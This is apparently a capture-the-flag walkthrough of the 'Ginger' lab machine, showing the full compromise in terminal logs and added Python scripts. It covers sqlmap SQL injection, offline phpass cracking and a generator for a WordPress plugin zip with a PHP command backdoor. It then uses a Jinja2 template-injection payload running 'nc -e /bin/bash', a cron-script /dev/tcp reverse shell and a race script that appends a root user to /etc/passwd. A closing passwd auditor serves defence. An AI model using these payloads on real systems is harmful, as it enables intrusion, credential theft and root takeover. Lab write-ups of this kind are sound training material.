┌──(root㉿kali)-[~/Desktop/hmv/Ginger]
└─# nmap -sCV 192.168.56.109 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 03:15 EDT
Nmap scan report for 192.168.56.109
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
| 256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
|_ 256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:EA:CD:54 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds
┌──(root㉿kali)-[~/Desktop/hmv/Ginger]
└─# dirsearch -u http://192.168.56.109/ -x 403
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/hmv/Ginger/reports/http_192.168.56.109/__25-05-19_03-16-27.txt
Target: http://192.168.56.109/
[03:16:27] Starting:
[03:16:50] 200 - 2KB - /wordpress/wp-login.php
[03:16:50] 200 - 3KB - /wordpress/
Task Completed
One of the WordPress plugins installed here exposes a SQL-injectable endpoint (the cpmvc_do_action parameters below belong to it), so sqlmap can dump the wp_users table:
python sqlmap.py -u "http://192.168.56.109/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=adddetails&id=1&calid=1"
[1 entry]
+----+-------------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+-------------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1 | http:\\/\\/192.168.0.14\\/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster | 0 | webmaster | webmaster | 2021-06-02 05:28:40 | <blank> |
+----+-------------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
Username: webmaster
Password hash: $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr.
The $P$ prefix is the phpass portable hash that WordPress stores in wp_users.user_pass; hashcat handles it as mode 400 and john as --format=phpass.
Cracking it gives the password: sanitarium
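For readers who want to see what a $P$ hash actually is, the following is an added example (not code from the original post) that reimplements the phpass scheme in Python and verifies a candidate password offline. The TARGET_HASH constant is the hash dumped above; the mini wordlist in the main block is constructed for illustration and stands in for the real wordlist used during the crack.

```python
"""Verify a WordPress phpass ("$P$") hash offline.

Added example for this write-up, not code from the original post. It
reimplements the portable phpass scheme behind wp_users.user_pass:
MD5(salt + password), then MD5(prev_digest + password) repeated 2**n times
(n is encoded in the 4th character; WordPress uses "B", i.e. 8192 rounds),
with the 16-byte digest written in phpass's own base64 alphabet. hashcat
(-m 400) and john (--format=phpass) do the same work at speed; this is for
understanding the format and confirming a candidate offline.
"""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hash dumped from the target's wp_users table above.
TARGET_HASH = "$P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr."


def encode64(raw: bytes, count: int) -> str:
    """phpass base64: 3 bytes -> 4 chars, little-endian, ITOA64 alphabet."""
    out = []
    i = 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(setting: str):
    """Split a phpass string into (prefix, round count, 8-char salt)."""
    if len(setting) < 12 or setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("round count out of range")
    return setting[:3], 1 << count_log2, setting[4:12]


def phpass_crypt(password: str, setting: str) -> str:
    """Full phpass hash of password under the salt/rounds in setting."""
    _, rounds, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(rounds):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + encode64(digest, 16)


def phpass_verify(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored hash."""
    return hmac.compare_digest(phpass_crypt(password, stored), stored)


def crack(stored: str, candidates):
    """Tiny dictionary attack: first candidate that verifies, else None."""
    for word in candidates:
        if phpass_verify(word, stored):
            return word
    return None


if __name__ == "__main__":
    # Constructed mini wordlist; the real run used a full wordlist.
    print(crack(TARGET_HASH, ["password", "webmaster", "sanitarium"]))
```

The 8192-round MD5 chain is why phpass is slow to brute-force in pure Python but trivial for a GPU cracker; the format itself gives nothing away beyond the salt and round count.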
With that we can log in to wp-admin. From there, upload a plugin with a known command-execution bug and use it to pop a shell.
If you can't find a suitable vulnerable plugin, you don't need one: WordPress unpacks whatever is in an uploaded plugin archive into wp-content/plugins/, so just add a PHP backdoor to any plugin zip.
Here I took an arbitrary plugin zip, dropped a backdoor file named 1.php into it, then installed and activated the plugin.
Once it is installed, request the backdoor through the plugin's directory (activation is not actually required; Apache serves the file as soon as the archive is unpacked):
http://192.168.56.110/wordpress/wp-content/plugins/<plugin-name>/<backdoor-file>
Then use it to launch a reverse shell.
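The following is an added example (not code from the original post) that builds such a plugin archive from scratch rather than modifying an existing one. WordPress only needs one PHP file with a "Plugin Name:" header comment to accept the upload as a plugin; every other file in the archive is copied verbatim. The plugin slug, the header text, the $_GET parameter name and the backdoor body are assumptions chosen for illustration; the file name 1.php is the one used above.

```python
"""Build a WordPress plugin zip that carries a PHP backdoor.

Added example for this write-up, not code from the original post. The
plugin slug, the header text and the backdoor body are assumptions.
"""
import io
import zipfile

PLUGIN_SLUG = "hello-ginger"   # assumed directory name under wp-content/plugins/
BACKDOOR_NAME = "1.php"        # file name used in the write-up

# Minimal header WordPress needs to recognise the archive as a plugin.
PLUGIN_HEADER = """<?php
/*
Plugin Name: Hello Ginger
Description: Placeholder plugin used to carry an uploaded file.
Version: 0.1
*/
"""

# Command-execution backdoor; the parameter name `cmd` is an assumption.
BACKDOOR_PHP = """<?php
if (isset($_GET['cmd'])) { system($_GET['cmd']); }
"""


def build_plugin_zip(slug=PLUGIN_SLUG, backdoor_name=BACKDOOR_NAME,
                     backdoor_body=BACKDOOR_PHP) -> bytes:
    """Return the bytes of a zip archive WordPress will install as a plugin."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", PLUGIN_HEADER)
        zf.writestr(f"{slug}/{backdoor_name}", backdoor_body)
    return buf.getvalue()


def backdoor_url(base, slug=PLUGIN_SLUG, backdoor_name=BACKDOOR_NAME) -> str:
    """Path the backdoor is served from once the archive is unpacked."""
    return f"{base.rstrip('/')}/wp-content/plugins/{slug}/{backdoor_name}"


def list_archive(data: bytes) -> list:
    """Sorted member names, for checking the layout before uploading."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return sorted(zf.namelist())


def read_member(data: bytes, name: str) -> bytes:
    """Contents of one archive member."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


if __name__ == "__main__":
    data = build_plugin_zip()
    with open(f"{PLUGIN_SLUG}.zip", "wb") as fh:
        fh.write(data)
    print(list_archive(data))
    print(backdoor_url("http://192.168.56.110/wordpress"))
```

Upload the resulting zip through Plugins > Add New > Upload Plugin, then request backdoor_url(...) with ?cmd=id to confirm execution as the web server user.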
(remote) www-data@ginger:/$ sudo -l
Matching Defaults entries for www-data on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on ginger:
(ALL : ALL) NOPASSWD: /usr/bin/sl
sl only draws the steam-locomotive animation; it offers nothing to escalate with.
(remote) www-data@ginger:/home/sabrina$ cat password.txt
I forgot my password again...
I wrote it down somewhere in this form: sabrina:password
but I don't know where... I have to search in my memory
There is also a picture in the home directory.
Looking at it first: it says "this is not a CTF", which is a hint not to waste time on steganography.
Per a writeup, the password was instead leaked into the kernel log. dmesg is readable by www-data here because kernel.dmesg_restrict is 0; with it set to 1, an unprivileged user would need another source, such as /var/log/kern.log (readable by group adm).
(remote) www-data@ginger:/home/sabrina$ dmesg |grep sabrina
[ 2.346603] sabrina:dontforgetyourpasswordbitch
sabrina@ginger:/home$ sudo -l
Matching Defaults entries for sabrina on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sabrina may run the following commands on ginger:
(webmaster) NOPASSWD: /usr/bin/python /opt/app.py *
sabrina@ginger:/home$ cat /opt/app.py
from flask import Flask, request, render_template_string,render_template
app = Flask(__name__)

@app.route('/')
def hello_ssti():
    person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
    if request.args.get('name'):
        person['name'] = request.args.get('name')
    template = '''<h2>Hello %s!</h2>''' % person['name']
    return render_template_string(template,person=person)

def get_user_file(f_name):
    with open(f_name) as f:
        return f.readlines()

app.jinja_env.globals['get_user_file'] = get_user_file

if __name__ == "__main__":
    app.run(debug=True)
The secret string is base64; decoding it gives ROT13 text:
sabrina@ginger:/home$ echo UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg== | base64 -d
Phevbhf? aivfvhz.pbz/pnerref
sabrina@ginger:/home$ echo "Phevbhf? aivfvhz.pbz/pnerref" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Curious? nvisium.com/careers
Nothing useful there.
The script starts a Flask app that is vulnerable to server-side template injection: the user-controlled name parameter is formatted into the template string before render_template_string evaluates it, so any {{ ... }} in it is executed as Jinja2. The app also registers get_user_file() as a template global, so {{ get_user_file('/etc/passwd') }} reads files without any gadget chain. Because sudo runs it as webmaster, a reverse shell fired from a template runs as webmaster.
The trailing * in the sudoers rule is a wildcard; the shell expands a literal * to the file names in the current directory, and app.py ignores its arguments, so it does not matter what it expands to. Start the app and get a shell.
sabrina@ginger:/home$ sudo -u webmaster /usr/bin/python /opt/app.py *
* Serving Flask app "app" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: on
* Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
* Restarting with stat
* Debugger is active!
* Debugger PIN: 303-692-316
# The app listens on 127.0.0.1:5000 only, so forward a reachable port to it (run on the target as sabrina):
socat TCP-LISTEN:1111,fork TCP:127.0.0.1:5000
# Reverse shell through the template injection (the Werkzeug debugger PIN printed above would also give code execution via the /console page; this route is simpler):
http://192.168.56.110:1111/?name={{ self.__init__.__globals__.__builtins__.__import__('os').popen('nc -e /bin/bash 192.168.56.102 8888').read() }}
Running pspy64 then shows that every minute caroline runs bash /home/caroline/backup/backup.sh (a cron job).
(remote) webmaster@ginger:/home/caroline/backup$ ls -la
total 12
drwxrwx--- 2 caroline webmaster 4096 May 22 2021 .
drwxr-xr-- 5 caroline webmaster 4096 May 25 2021 ..
-rwxr-xr-x 1 caroline caroline 44 May 21 2021 backup.sh
backup.sh itself is owned by caroline and not writable by us, but the backup directory is drwxrwx--- caroline webmaster, and write permission on a directory is what controls deleting and creating entries. So delete the file and write a new backup.sh with the same name; the cron job picks it up on its next run (the >& /dev/tcp redirection is a bash feature, which is fine because cron invokes it with bash):
(remote) webmaster@ginger:/home/caroline/backup$ cat backup.sh
sh -i >& /dev/tcp/192.168.56.102/8889 0>&1
(remote) caroline@ginger:/home$ sudo -l
Matching Defaults entries for caroline on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User caroline may run the following commands on ginger:
(ALL : ALL) NOPASSWD: /srv/code
(remote) caroline@ginger:/home$ /srv/code
Reversing the binary in IDA shows that it runs a command as root and then leaves a window of about five seconds during which /etc/passwd can be modified by another user.
That is enough to append a uid 0 user of our own.
# Generate a password hash (openssl passwd defaults to traditional DES crypt; a hash placed in the second field of /etc/passwd is used directly instead of the entry in /etc/shadow)
(remote) caroline@ginger:/home$ openssl passwd 123456
.plP2.ShPb.iI
echo 'c1trus:.plP2.ShPb.iI:0:0:root:/root:/bin/bash' >> /etc/passwd
Background /srv/code with & so the window opens, then immediately run the echo above to add the backdoor user:
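Typing the echo by hand inside a five-second window works but is fiddly. The following is an added example (not code from the original post) that does the same thing with a poller: it backgrounds the privileged helper, waits until the target file reports writable, appends the line once and stops. What /srv/code does internally is taken from the description above (it leaves /etc/passwd modifiable for a few seconds); the account name and DES crypt hash are the ones used in this write-up, and the demo_* helpers are there only so the logic can be exercised against a temporary file instead of the real /etc/passwd.

```python
"""Append a line to /etc/passwd inside the window /srv/code opens.

Added example for this write-up, not code from the original post.
"""
import os
import subprocess
import sys
import tempfile
import time

PASSWD = "/etc/passwd"
# "openssl passwd 123456" as generated above (DES crypt of 123456).
BACKDOOR_LINE = "c1trus:.plP2.ShPb.iI:0:0:root:/root:/bin/bash"


def wait_writable(path, timeout, interval=0.05):
    """Poll until the current user may write `path`, or give up after timeout."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if os.access(path, os.W_OK):
            return True
        time.sleep(interval)
    return False


def append_line(path, line):
    """Append `line` unless it is already there; True when a write happened."""
    with open(path, "r+") as fh:
        if line in fh.read().splitlines():
            return False
        fh.seek(0, os.SEEK_END)
        fh.write(line + "\n")
    return True


def read_lines(path):
    """Lines of `path`, for checking the result."""
    with open(path) as fh:
        return fh.read().splitlines()


def run_race(helper_cmd, path=PASSWD, line=BACKDOOR_LINE, timeout=10.0):
    """Background the privileged helper, wait for the window, then append."""
    proc = subprocess.Popen(helper_cmd)
    try:
        if not wait_writable(path, timeout):
            return False
        return append_line(path, line)
    finally:
        proc.wait()


def demo_path():
    """A not-yet-existing file in a private temp dir (stands in for /etc/passwd)."""
    return os.path.join(tempfile.mkdtemp(), "passwd")


def demo_helper_cmd(path, delay):
    """Stand-in for /srv/code: after `delay` seconds make `path` exist and writable."""
    return [sys.executable, "-c",
            "import sys,time; time.sleep(float(sys.argv[2])); open(sys.argv[1],'a').close()",
            path, str(delay)]


if __name__ == "__main__":
    # sudoers on the box: (ALL : ALL) NOPASSWD: /srv/code for caroline
    ok = run_race(["sudo", "-u", "root", "/srv/code"])
    print("backdoor appended" if ok else "window not observed")
```

append_line keeps the file descriptor open across the write, so even if /srv/code restores the original permissions while the line is being written, the already-open descriptor is unaffected.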
(remote) caroline@ginger:/home$ sudo -u root /srv/code &
[1] 11609
(remote) caroline@ginger:/home$ echo 'c1trus:.plP2.ShPb.iI:0:0:root:/root:/bin/bash' >> /etc/passwd
(remote) caroline@ginger:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
sabrina:x:1000:1000:sabrina,,,:/home/sabrina:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
webmaster:x:1001:1001:,,,:/home/webmaster:/bin/bash
caroline:x:1002:1002:,,,:/home/caroline:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
c1trus:.plP2.ShPb.iI:0:0:root:/root:/bin/bash
[1]+ Done sudo -u root /srv/code
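From the defender's side, the entry just added is easy to spot. The following is an added example (not code from the original post) of the check a responder would run over /etc/passwd after an intrusion of this kind: it flags uid 0 accounts other than root, password hashes stored inline instead of the "x" that defers to /etc/shadow (pam_unix honours such a hash, which is exactly why the trick works), shared uids and malformed lines. The sample input is a constructed excerpt of the passwd dump above.

```python
"""Audit a passwd file for the kind of backdoor account added above.

Added example for this write-up, not code from the original post.
"""
from collections import Counter
from dataclasses import dataclass

# Constructed excerpt of the /etc/passwd dump shown in the write-up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sabrina:x:1000:1000:sabrina,,,:/home/sabrina:/bin/bash
webmaster:x:1001:1001:,,,:/home/webmaster:/bin/bash
caroline:x:1002:1002:,,,:/home/caroline:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
c1trus:.plP2.ShPb.iI:0:0:root:/root:/bin/bash
"""

# Password-field values that carry no usable hash (shadowed, locked or empty).
SHADOWED = {"x", "*", "!", "!!", ""}


@dataclass(frozen=True)
class Finding:
    user: str
    reason: str


def parse_passwd(text):
    """Yield (lineno, fields) per non-comment line; fields is None when malformed."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        yield lineno, fields if len(fields) == 7 else None


def audit_passwd(text):
    """Findings for extra uid 0 accounts, inline hashes, shared uids, bad lines."""
    findings = []
    uids = Counter()
    for lineno, fields in parse_passwd(text):
        if fields is None:
            findings.append(Finding(f"line {lineno}", "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append(Finding(name, f"non-numeric uid {uid!r}"))
            continue
        uids[int(uid)] += 1
        if int(uid) == 0 and name != "root":
            findings.append(Finding(name, "uid 0 account other than root"))
        if pw not in SHADOWED and not pw.startswith("!"):
            findings.append(Finding(name, "password hash stored in passwd, bypasses /etc/shadow"))
    for uid, count in uids.items():
        if count > 1:
            findings.append(Finding(f"uid {uid}", f"shared by {count} accounts"))
    return findings


def audit_file(path="/etc/passwd"):
    """Run the audit against a real passwd file."""
    with open(path) as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{finding.user}: {finding.reason}")
```

Pair this with file-integrity monitoring on /etc/passwd and an audit rule on writes to it; the five-second window /srv/code opens is invisible to a periodic check but not to auditd.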
(remote) caroline@ginger:/home$ su c1trus
Password:
root@ginger:/home# whoami
root
root@ginger:/home# id
uid=0(root) gid=0(root) groups=0(root)
root@ginger:/home#
root@ginger:~# cat root.txt
ae426c9d237d676044e5cd8e8af9ef7f